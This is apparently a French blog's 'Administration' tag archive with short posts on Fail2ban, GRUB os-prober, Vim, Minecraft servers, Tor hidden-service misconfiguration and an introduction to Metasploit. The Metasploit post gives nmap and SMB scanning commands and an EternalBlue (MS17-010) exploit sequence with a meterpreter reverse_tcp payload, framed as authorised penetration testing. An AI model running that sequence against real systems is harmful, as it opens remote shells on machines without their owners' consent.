Archives par mot-clé : Administration

En informatique, l’administration désigne le processus de gestion, de configuration et de maintenance des systèmes, des réseaux, des serveurs et des services informatiques. Cela inclut généralement des tâches telles que l’installation et la configuration des logiciels, la gestion des utilisateurs et des droits d’accès, la surveillance des performances, la résolution des problèmes techniques, la sauvegarde des données, la sécurité informatique, et bien d’autres encore.

L’administration informatique peut être effectuée à différents niveaux. Allant d’un seul ordinateur à plusieurs machine d’un réseau complexe comprenant plusieurs serveurs et services interconnectés. Les administrateurs système ou les professionnels de l’administration réseau sont responsables de ces tâches et doivent avoir une bonne connaissance des technologies, des protocoles et des outils utilisés dans l’environnement informatique concerné.

En résumé, l’administration informatique consiste à gérer, maintenir et optimiser les ressources informatiques. Afin d’en assurer leur bon fonctionnement, leur sécurité et leur disponibilité pour les utilisateurs.

Fail2ban Sécurisez Votre Serveur Linux Contre les Attaques

Fail2ban : Sécurisez Votre Serveur Linux Contre les Attaques

Fail2ban - illustration

Fail2ban Sécurisez Votre Serveur Linux Contre les Attaques

Introduction

La sécurité en ligne est essentielle de nos jours, en particulier pour les serveurs Linux exposés sur Internet. Fail2ban est un outil puissant conçu pour protéger votre serveur contre les attaques pa force brute et les intrusions. Dans cet article, nous allons explorer l’histoire de Fail2ban, vous guider à travers son installation sur différentes distributions Linux, puis vous montrer comment l’utiliser efficacement avec des exemples et des scripts.

Histoire de Fail2ban

Fail2ban a été créé en 2004 par Cyril Jaquier en réponse à la nécessité croissante de protéger les serveurs contre les attaques automatisées. Il est devenu un outil incontournable pour de nombreux administrateurs système et est toujours activement développé et maintenu aujourd’hui.

Installation de Fail2ban

Debian/Ubuntu

Sur Debian et Ubuntu, l’installation de Fail2ban est simple. Ouvrez votre terminal et exécutez les commandes suivantes :

sudo apt update
sudo apt install fail2ban

CentOS/RHEL

Pour CentOS et Red Hat Enterprise Linux (RHEL), vous pouvez utiliser yum pour installer Fail2ban :

sudo yum install epel-release
sudo yum install fail2ban

Configuration de Fail2ban

Une fois Fail2ban installé, vous devez configurer son comportement en modifiant le fichier de configuration principal `/etc/fail2ban/jail.conf`. Vous pouvez également créer un fichier de configuration personnalisé dans `/etc/fail2ban/jail.d/` pour éviter de modifier directement le fichier principal.

Voici quelques paramètres importants que vous pouvez configurer dans le fichier de configuration :

– `bantime` : Durée en secondes pendant laquelle un hôte est interdit d’accès après un certain nombre d’échecs.
– `maxretry` : Nombre maximum d’échecs autorisés avant que l’IP soit bannie.
– `findtime` : Fenêtre de temps en secondes pendant laquelle `maxretry` doit être atteint pour bannir une IP.

Utilisation de Fail2ban

Une fois configuré, Fail2ban surveille les journaux de votre serveur à la recherche de tentatives d’intrusion. Par exemple, pour surveiller les tentatives de connexion SSH échouées, il faut ajouter la configuration suivante dans le fichier de configuration :

[sshd]
enabled = true
port = ssh
filter = sshd
logpath = /var/log/auth.log
maxretry = 3

Après avoir enregistré la configuration, redémarrez Fail2ban pour appliquer les modifications :

sudo systemctl restart fail2ban

Exemples d’utilisation

– Bloquer les tentatives de connexion SSH échouées :

sudo fail2ban-client set sshd banip IP_ADDRESS

– Afficher la liste des adresses IP bannies :

sudo fail2ban-client status sshd

– Retirer une adresse IP de la liste des bannies :

sudo fail2ban-client unban IP_ADDRESS

Automatisation avec des Scripts

Pour faciliter l’exploitation de Fail2ban, vous pouvez créer des scripts personnalisés pour automatiser certaines tâches. Par exemple, vous pouvez créer un script qui extrait automatiquement les adresses IP bannies et les envoie par e-mail à l’administrateur.

#!/bin/bash

banned_ips=$(sudo fail2ban-client status sshd | grep "Banned IP list" | awk '{print $7}')

if [ -n "$banned_ips" ]; then
echo "IPs bannies :"
echo "$banned_ips"
# Envoyer par e-mail à l'administrateur
# Insérer votre code d'envoi d'e-mail ici
else
echo "Aucune IP n'est bannie pour le moment."
fi

 

N’oubliez pas de rendre le script exécutable avec :

chmod +x script.sh

 

D’autres scriptes sont disponible ici

Conclusion

Fail2ban est un outil puissant pour renforcer la sécurité de votre serveur Linux en protégeant contre les attaques automatisées. En installant, configurant et automatisant son utilisation, vous pouvez renforcer la sécurité de votre serveur tout en minimisant les risques d’intrusion. Assurez-vous de garder Fail2ban à jour pour bénéficier des dernières fonctionnalités et corrections de sécurité.

Fail2ban Sécurisez Votre Serveur Linux Contre les Attaques

Découvrez Metasploit : L’Art de la Sécurité Informatique

Découvrez Metasploit : L’Art de la Sécurité Informatique

 

logo Metasploit

La sécurité informatique est devenue un enjeu majeur dans notre monde interconnecté. Que vous soyez un professionnel de la cybersécurité ou simplement curieux de comprendre comment fonctionnent les tests de pénétration, vous serez intrigué par Metasploit. Cet outil puissant est un incontournable dans l’arsenal d’un hacker éthique ou d’un analyste de sécurité. Dans cet article, nous plongerons dans les profondeurs de Metasploit et explorerons quelques exemples d’utilisation.

Qu’est-ce que Metasploit ?

Metasploit est une plateforme de test de pénétration open-source développée pour aider les professionnels de la sécurité à évaluer la vulnérabilité de leurs systèmes informatiques. Créé par H.D. Moore en 2003, Metasploit est depuis devenu une référence en matière de tests de sécurité. L’outil offre une large gamme de fonctionnalités pour effectuer des analyses de vulnérabilité, des tests d’intrusion, des audits de sécurité, et plus encore.

1. Installation et lancement

Pour commencer, téléchargez et installez Metasploit Framework à partir de son site officiel. Une fois installé, lancez Metasploit en ouvrant un terminal et en exécutant la commande msfconsole.

msfconsole

 

2. Scanning du réseau

La première étape consiste souvent à scanner un réseau pour identifier les hôtes actifs et les ports ouverts. Utilisez le puissant outil de scan Nmap pour cela. Par exemple, pour scanner une plage d’adresses IP, exécutez :

nmap -sn 192.168.1.0/24

 

3. Analyse des vulnérabilités

Metasploit propose une variété de modules pour analyser les vulnérabilités des systèmes cibles. Utilisons le module SMB Version pour scanner les vulnérabilités SMB sur une machine spécifique. Voici comment :

use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.1.100
run

4. Exploitation des vulnérabilités

Lorsque vous identifiez une vulnérabilité, il est temps de l’exploiter. Metasploit propose des modules d’exploit pour cela. Par exemple, exploitons la vulnérabilité MS17-010 (EternalBlue) pour accéder à un système vulnérable :

use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.1.150
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST VOTRE_ADRESSE_IP
exploit

5. Post-exploitation

Une fois que vous avez réussi à accéder à la machine cible, les modules post-exploitation vous permettent d’exécuter des commandes, de collecter des informations et de maintenir un accès persistant.

Éthique et Légalité

Il est impératif de souligner que l’utilisation de Metasploit doit être éthique et légale. Vous devez obtenir une autorisation écrite pour effectuer des tests de pénétration sur des systèmes qui ne vous appartiennent pas.

Conclusion sur découvrez Metasploit : L’Art de la sécurité informatique

Metasploit est bien plus qu’un simple outil, c’est une plateforme complète pour explorer et tester la sécurité de systèmes informatiques. Son utilisation appropriée permet de renforcer la sécurité et d’identifier les vulnérabilités potentielles. Cependant, rappelez-vous toujours que la responsabilité et l’éthique doivent guider chaque action entreprise avec cet outil puissant.

Alors que vous plongez dans le monde de la cybersécurité, Metasploit vous accompagnera dans votre quête de connaissances et de maîtrise de l’art de la sécurité informatique.

Créer des plugins Minecraft personnalisés

Créer des plugins Minecraft personnalisésbannière Minecraft

Libérez votre créativité et enrichissez votre expérience de jeu !

 

Introduction :

Les plugins personnalisés constituent un moyen fantastique d’explorer de nouvelles possibilités dans Minecraft. Que vous souhaitiez ajouter des fonctionnalités uniques, des mécanismes de gameplay excitants ou des éléments esthétiques à votre serveur, la création de plugins sur mesure peut vous permettre de repousser les limites de votre expérience de jeu. Nous vous guiderons à travers les étapes de création d’un plugin Minecraft et vous donnerons des exemples concrets pour vous inspirer.

Choisissez votre environnement de développement: Avant de commencer à créer votre plugin Minecraft, vous devrez choisir un environnement de développement intégré (IDE) adapté. Des options populaires telles que Eclipse ou IntelliJ IDEA offrent des fonctionnalités avancées pour faciliter la programmation et le débogage de votre code.

Configurez votre projet :

Une fois votre IDE en place, configurez un nouveau projet Minecraft en ajoutant le framework Bukkit en tant que dépendance. Cela vous permettra d’accéder à l’API Bukkit, qui fournit les outils nécessaires pour développer des plugins compatibles avec Minecraft.

Créez votre plugin :

Dans votre projet, créez une classe principale pour votre plugin en étendant la classe Plugin de Bukkit. Cette classe sera le point d’entrée de votre plugin et lui permettra de s’intégrer à l’environnement Minecraft. Par exemple, vous pouvez créer un plugin de téléportation qui permet aux joueurs de se déplacer rapidement entre différentes régions de votre monde virtuel.

Implémentez des fonctionnalités personnalisées :

Une fois que votre plugin est configuré, vous pouvez commencer à ajouter des fonctionnalités personnalisées. Par exemple, vous pourriez implémenter une fonctionnalité de boutique virtuelle où les joueurs peuvent échanger des ressources contre des objets spéciaux. Ou encore, vous pourriez créer un plugin de mini-jeu qui propose des défis et récompenses uniques pour les joueurs.

Optimisez votre plugin pour le référencement :

Lorsque vous créez votre plugin, il est important de le rendre convivial pour les moteurs de recherche (SEO) afin qu’il puisse être facilement trouvé par les joueurs. Utilisez des mots-clés pertinents dans le nom de votre plugin, sa description et ses balises. Assurez-vous également que votre plugin est compatible avec les dernières versions de Minecraft pour garantir une meilleure visibilité.

Conclusion :

La création de plugins Minecraft personnalisés offre une opportunité passionnante de mettre en œuvre vos idées uniques et de personnaliser votre expérience de jeu. En suivant les étapes mentionnées ci-dessus et en laissant libre cours à votre créativité, vous pouvez développer des plugins qui ajoutent de la profondeur, de l’excitation et de l’originalité à votre serveur Minecraft. Alors, lancez-vous et découvrez les possibilités infinies qui s’offrent à vous dans le monde merveilleux de la création de plugins Minecraft !

grub2 – partitions bootable manquante

grub2 et osprober

grub2 osprober

Message d’erreur :

warning: osprober will not be executed to detect other bootable partitions:
check GRUB_DISABLE_OS_PROBER documentation entry

Explication :

Depuis Grub 2.6, la valeur par défaut de GRUB_DISABLE_OS_PROBER est passée de « false » à « true« 

Résolution :

Pour activer os-prober lors de l’exécution de update-grub il faut donc ajouter à /etc/default/grub

GRUB_DISABLE_OS_PROBER=false

puis relancer un update-grub

update-grub

Grub en quelques mots

GRUB2, également connu sous le nom de GRand Unified Bootloader 2, est un gestionnaire de démarrage utilisé principalement dans les systèmes d’exploitation basés sur Linux. Il est la version améliorée de GRUB (GRUB Legacy) et est largement utilisé sur de nombreuses distributions Linux.

Voici quelques points importants à savoir sur GRUB2 :

Gestionnaire de démarrage

GRUB2 est responsable de l’amorçage du système d’exploitation lors du démarrage de l’ordinateur. Il est installé dans le MBR (Master Boot Record) ou le secteur de démarrage de la partition et permet de choisir le système d’exploitation à lancer.

Configuration flexible

GRUB2 utilise un fichier de configuration appelé « grub.cfg » pour déterminer les options de démarrage et la manière dont les différents systèmes d’exploitation sont chargés. Ce fichier de configuration peut être modifié pour personnaliser les options de démarrage, ajouter des entrées supplémentaires, modifier les paramètres par défaut, etc.

Support de plusieurs systèmes d’exploitation

GRUB2 est capable de démarrer différents systèmes d’exploitation, y compris différentes versions de Linux, Windows, macOS, BSD, Solaris, etc. Il détecte automatiquement les systèmes d’exploitation installés sur le disque dur et les ajoute à son menu de démarrage.

Interface utilisateur

GRUB2 propose une interface utilisateur en ligne de commande pour sélectionner les options de démarrage. Il permet également de définir un menu graphique avec des thèmes personnalisés, des images de fond, des couleurs, etc., offrant une expérience plus conviviale.

Fonctionnalités avancées

GRUB2 offre de nombreuses fonctionnalités avancées, telles que le support du chiffrement des partitions, la prise en charge des volumes logiques LVM, le démarrage en réseau (PXE), la gestion des modules, la détection automatique des noyaux Linux, etc.

Dépannage

En cas de problèmes de démarrage, GRUB2 propose des options de dépannage, notamment l’accès à une ligne de commande pour effectuer des réparations manuelles, la restauration de la configuration par défaut, la réinstallation de GRUB2, etc.

Il convient de noter que GRUB2 est un logiciel open source. Il est largement utilisé et maintenu par la communauté Linux. De ce fait, il continue d’évoluer avec de nouvelles fonctionnalités, des correctifs de sécurité et des améliorations apportées par les développeurs et les contributeurs.

Fail2ban – lister et trier les IP bannies

Lister et trier les ips bannies par Fail2ban

Il est utile de connaitre les IPs actuellement bannies par l’excellent Fail2ban.Nous allons lister et trier les ips bannies par Fail2ban avec awk.Fail2ban_logo

 

Pour rappelle cette application permet de définir le nombre de tentative maximum de connexion pour un service donné. Il peux être très intéressant pour des services tel que ssh et son daemon sshd, mais pas que. Je vous laisse vous documenter sur Fail2ban

les ips bannies par Fail2ban

Personnellement j’utilise :

awk '($(NF-1) = /Ban/){print $NF}' /var/log/fail2ban.log | sort | uniq -c | sort -n

cette commande vous renvoi les IP bannies avec leur nombre de tentative. Information importante pour bannir les IP définitivement de l’accès à votre serveur/machine.

Vérifier le fonctionnement de Fail2ban :

fail2ban-client status sshd

retourne le statut de la prison « sshd » (avec le nombre de tentatives échouées et la liste des IP bannies)

sinon le classique

systemctl status fail2ban

doit retourner un Active: active (running) since et une date depuis laquelle Fail2ban est actif.

Vi et Vim – Chercher et remplacer

Petite note personnelle pour un pense bête sur Vi et Vim

Vi et Vim – Chercher et remplacer

Vi et Vim - Chercher et remplacer

Vi et Vim – Chercher et remplacer

Rechercher « toto » et remplacer par « tata » sans demander à chaque occurrence trouvée :

:%s/toto/tata/g

Rechercher « toto » et remplacer par « tata » et demander à chaque occurrence trouvée :

:%s/toto/tata/gc

 

On oublie pas de quitter et sauvegarder nos modifications avec :

:wq

Voici un exemple d’utilisation de Vi ou Vim pour chercher et remplacer du texte.

Ajoutez ou modifiez une icone pour mon serveur Minecraft

bannière Minecraft

L’icône de votre serveur doit répondre à des exigences spécifiques pour être affichée coté client.



  • La taille de l’icône doit être 64px par 64pxLe format d’image doit être PNG (.png)Le nom du fichier doit être « server-icon.png » exactement


Icone serveur Minecraft server-icon.png

Uploade du fichier server-icon.png

Ensuite il faut déposer le fichier server-icon.png vers le répertoire principal de votre serveur. Là ou se situe le fichier .jar.

N’importe quel protocole fait l’affaire : SSH, FTP, SFTP…

Moi j’ai ensuite redémarrer le serveur. et c’était OK.

Des services Tor identifiables

BSelon le chercheur en sécurité Yonathan Klijnsma, de RiskIQ, cité par Bleeping Computer, des serveurs web (Apache ou Nginx) mal configurés écoutent une adresse IP sur l’Internet public, plutôt que leur localhost (127.0.0.1).

Les serveurs mal configurés : une menace pour la sécurité en ligne

Dans le cas d’un service Tor, la configuration sécurisée des serveurs web est tout aussi cruciale, voire même plus importante. Tor est un réseau décentralisé qui permet aux utilisateurs de naviguer sur Internet de manière anonyme en faisant transiter leur trafic à travers plusieurs nœuds, masquant ainsi leur véritable adresse IP. Cependant, cette anonymisation peut également attirer l’attention des cybercriminels cherchant à exploiter les vulnérabilités pour découvrir l’origine du trafic.

La spécificité des services cachés Tor

Les services cachés Tor sont des sites web ou des services accessibles uniquement via le réseau Tor. Ces services utilisent des adresses en « .onion » et sont destinés à offrir une plus grande confidentialité et anonymat à leurs utilisateurs. Cependant, la gestion sécurisée de ces services est essentielle pour éviter toute compromission.

Les risques liés à une mauvaise configuration

Si un service caché Tor est mal configuré, plusieurs risques de sécurité peuvent survenir :

Dé-anonymisation des utilisateurs : Une mauvaise configuration du serveur peut potentiellement exposer des informations sur les utilisateurs qui se connectent au service caché, mettant ainsi en danger leur anonymat.

Vulnérabilités d’exécution distante de code : Des failles de sécurité pourraient permettre à des attaquants de prendre le contrôle du serveur et de l’utiliser pour des activités malveillantes.

Fuite d’informations sensibles : Des erreurs de configuration pourraient conduire à la divulgation accidentelle d’informations sensibles, telles que des clés privées ou des données utilisateur.

Attaques sur le réseau Tor : Un serveur mal configuré pourrait également être utilisé pour mener des attaques contre d’autres services cachés Tor, compromettant ainsi l’ensemble du réseau.

Meilleures pratiques pour sécuriser un service caché Tor

Pour garantir la sécurité d’un service caché Tor, voici quelques meilleures pratiques à suivre :

Utilisation de versions à jour : Assurez-vous que le logiciel du serveur et les dépendances utilisées sont régulièrement mises à jour pour bénéficier des derniers correctifs de sécurité.

Restriction d’accès : Configurez le serveur pour qu’il n’écoute que sur l’interface de réseau local (localhost) et empêchez les connexions extérieures non autorisées.

Isolation du service : Utilisez des techniques d’isolation, telles que les conteneurs ou les machines virtuelles, pour limiter les interactions entre le service caché et le reste du système.

Chiffrement fort : Activez le chiffrement SSL/TLS avec des certificats valides pour sécuriser les communications entre le serveur et les utilisateurs du service caché.

Configuration par défaut sécurisée : Vérifiez et modifiez les paramètres de configuration par défaut pour éliminer les vulnérabilités potentielles.

Audits de sécurité réguliers : Effectuez des audits de sécurité périodiques pour identifier et résoudre tout problème de configuration ou de vulnérabilité.

En conclusion

La sécurité d’un service caché Tor dépend grandement d’une configuration adéquate du serveur web. En prenant des mesures pour assurer la confidentialité et l’intégrité du service, les propriétaires de sites web .onion peuvent offrir à leurs utilisateurs un environnement en ligne plus sûr et protéger l’anonymat que Tor est censé fournir.

 

A voir : https://m.nextinpact.com/brief/des-services-caches-tor-identifiables-via-leur-certificat-tls-5248.htm